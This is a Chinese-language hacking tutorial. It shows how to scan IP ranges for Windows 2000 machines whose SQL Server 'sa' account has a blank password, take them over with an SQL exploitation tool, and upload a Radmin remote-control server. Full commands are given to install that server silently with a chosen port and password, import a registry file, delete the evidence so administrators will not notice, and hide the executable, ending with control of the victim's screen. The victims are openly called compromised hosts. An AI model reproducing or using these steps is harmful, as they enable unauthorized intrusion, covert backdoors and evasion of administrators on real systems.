作者:setwell

组织:黑色反击

www.hf110.com

准备工具: Windows NT/2000 自动攻击探测机
         SQL综合利用工具
          radmin服务端
          Radmin影子版3.2

打开Windows NT/2000 自动攻击探测机,作简单的设置.在"netbios"中,勾上"列出所有简单的管理员帐号",在"SQL漏洞"中勾上"列出密码为空的SA帐号".然后,再在起始IP和结束IP中填入要探测的IP.点开始,扫描.如图1

一会儿,就扫到几个有SQL漏洞的机子,我们选项一个.如图2

打开SQL综合利用工具的"SQL服务器设置".输入刚才的IP,点确定,一会儿便连接成功.如图3

打开"利用目录"执行一下DOS命令,可以看出是2000系统的.如果是Windows,则是XP系统或其它系统,这样的系统一般上传后门或服务端不会成功的.我们只要2000系统.如图4

现在开始上传radmin服务端,先上传r_server.显示上传成功.如图5

我们来看一下是不是真的上传成功了,执行一下dir 命令,如图6.

可以看出,上传成功了.其它的aaa.reg,admkll.dll类似.
radmin服务端全部上传后,我们现在开装.安装命令如下

r_server /install /silence                            //安装r_server    

r_server.exe /port:4848 /pass:3407 /save /silence     //把端口定为4848,密码为3407            

regedit.exe /s aaa.reg                                 //把aaa.reg 导入肉鸡的注册表

net start r_server                                      //启动r_server

del aaa.reg                                              //为了防止让细心的管理员知道,删除用完的aaa.reg

attrib.exe +h r_server.exe                               //隐藏r_server.exe 

看图7,其它命令类似.

打开 Radmin影子版3.2的控制端,输入IP,设定的端口,这儿是4848,点确定,如图8

输入密码,成功看到了肉鸡的屏幕.如图9